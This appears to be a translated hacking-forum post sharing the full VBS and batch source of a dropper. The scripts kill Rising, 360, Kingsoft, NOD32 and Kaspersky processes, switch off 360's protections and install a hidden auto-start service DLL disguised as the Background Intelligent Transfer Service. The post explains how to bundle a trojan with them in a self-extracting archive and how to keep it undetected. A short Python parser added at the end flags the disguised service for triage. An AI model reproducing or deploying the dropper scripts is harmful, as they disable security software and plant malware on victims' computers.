
      Kill Rising, Kingsoft, NOD32, 360


      This uses two bat files and two vbs files, plus one kill.

      The source code follows:

      Source of setdt.vbs:

      set Cleaner=createobject("wscript.shell")

      Cleaner.run "setdt.bat",vbhide

      .......

      Source of setdt.bat:

      @ECHO OFF

      @date /t>C:\time.txt

      date 1988-09-18

      hide.vbs

      @date <C:\time.txt

      del %SystemRoot%\system32\setdt.vbs

      del %SystemRoot%\system32\hide.vbs

      del %SystemRoot%\system32\command.exe

      del %SystemRoot%\system32\xKill.exe

      del %SystemRoot%\system32\xkill.bat

      del C:\time.txt

      del %0

      ..................

      Source of hide.vbs:

      dim shell

      set shell=CreateObject("Wscript.Shell")

      WScript.Sleep 100000

      shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0

      set Cleaner=createobject("wscript.shell")

      Cleaner.run "xkill.bat",vbhide

      WScript.Sleep 100000

      shell.run "cmd /c start %SystemRoot%\system32\command.exe",0

      ......................

      Source of xkill.bat:

      @echo off

      taskkill /f /im rstray.exe >NUL

      taskkill /f /im 360tray.exe >NUL

      taskkill /f /im 360safe.exe >NUL

      echo Windows Registry Editor Version 5.00>>kill.reg

      echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg

      echo "MonAccess"=dword:00000000>>kill.reg

      echo "SiteAccess"=dword:00000000>>kill.reg

      echo "ExecAccess"=dword:00000000>>kill.reg

      echo "UDiskAccess"=dword:00000000>>kill.reg

      echo "LeakShowed"=dword:00000000>>kill.reg

      sc create DARK binpath= %windir%\System32\darkkill.dll

      sc config DARK start= disabled

      echo Windows Registry Editor Version 5.00>>dark.reg

      echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg

      echo "Type"=dword:00000110>>dark.reg

      echo "Start"=dword:00000002>>dark.reg

      echo "ErrorControl"=dword:00000001>>dark.reg

      echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg

      echo   74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg

      echo   00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg

      echo   6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg

      echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg

      echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg

      echo "DependOnGroup"=hex(7):00,00>>dark.reg

      echo "ObjectName"="LocalSystem">>dark.reg

      echo "Description"=hex(2):00,00>>dark.reg

      echo

      echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg

      echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg

      echo   00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg

      echo   72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg

      echo

      echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg

      echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg

      echo   00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg

      echo   00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg

      echo   05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg

      echo   20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg

      echo   00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg

      echo   00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg

      echo

      echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg

      echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg

      echo "Count"=dword:00000001>>dark.reg

      echo "NextInstance"=dword:00000001>>dark.reg

      regedit /s dark.reg

      regedit /s kill.reg

      COPY dark.dll %windir%\System32\darkkill.dll

      sc config DARK start= AUTO

      net start DARK

      attrib %windir%\System32\darkkill.dll +s +h

      del kill.reg

      del dark.reg

      del dark.dll

      del dark.exe

      xkill.exe

      taskkill /f /im kav.exe >NUL

      del %0

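      I can't program, so I had to start with vbs and bat; it feels pretty good.

      As for xkill.exe: a friend gave me a packer program, said the packer had a backdoor, and asked me to see whether I could remove it.

      Without quite knowing what I was doing, I extracted the core part and then processed it to evade antivirus detection.

      Run directly, xkill.exe can terminate Rising, NOD32 and Kingsoft; I have not tested others.

      Still, I suggest using xkill.exe together with these vbs and bat files of mine; that way it can also take out 360 and Kaka, and it should also be able to break Kaspersky's proactive defense.

      If you ask why I don't install Kaspersky and try it: I already have 5 security products installed on my machine, and adding Kaspersky would really be too much~~

      Please don't upload xkill.exe to antivirus scanning sites to try it. I once had a genuinely undetected trojan in front of me and did not cherish it: I uploaded it to the scanning site www.virustotal.com, and the result........

      After extracting this small tool, copy your trojan into the extraction directory and rename it command.exe, then pack everything with WinRAR into a self-extracting archive and set it to run setdt.vbs after extraction.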
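For triage of the dark.reg that xkill.bat builds above, the following added example (not part of the original post) decodes the hex(2) values of a .reg export and flags a service key that borrows a well-known Windows display name. The helper names `parse_reg`, `audit_services` and `KNOWN_DISPLAY_NAMES` are hypothetical, and the sample is a subset of the page's own DARK values with the echo wrappers stripped.

```python
import re

# Constructed sample: subset of the DARK values xkill.bat writes to dark.reg.
DARK_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]
"Start"=dword:00000002
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
  6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00
"DisplayName"="Background Intelligent Transfer Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]
"ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\
  00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\
  72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00
'''

# Illustrative allowlist (assumption): display name -> the key name Windows uses.
KNOWN_DISPLAY_NAMES = {"background intelligent transfer service": "BITS"}

def parse_reg(text):
    """Return {key_path: {value_name: decoded_value}} from .reg text."""
    text = re.sub(r"\\\r?\n\s*", "", text)  # join "\" line continuations
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
        elif current is not None and (m := re.match(r'"([^"]+)"=(.*)$', line)):
            name, raw = m.groups()
            if raw.startswith("dword:"):
                current[name] = int(raw[6:], 16)
            elif raw.startswith(("hex(2):", "hex(7):")):  # UTF-16LE string data
                data = bytes(int(b, 16) for b in raw[7:].split(",") if b)
                current[name] = data.decode("utf-16-le").rstrip("\x00")
            else:
                current[name] = raw.strip('"').replace("\\\\", "\\")
    return keys

def audit_services(keys):
    """Flag service keys whose DisplayName belongs to a different known service."""
    findings = []
    for path, vals in keys.items():
        name = path.rsplit("\\", 1)[-1]
        expected = KNOWN_DISPLAY_NAMES.get(str(vals.get("DisplayName", "")).lower())
        if expected and expected.lower() != name.lower():
            dll = keys.get(path + "\\Parameters", {}).get("ServiceDll", "")
            findings.append((name, expected, vals.get("Start"), vals.get("ImagePath"), dll))
    return findings
```

On the page's values the audit reports the key DARK carrying the BITS display name, set to auto-start under `svchost.exe -k netsvcs` with ServiceDll `C:\WINDOWS\system32\darkkill.dll`.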

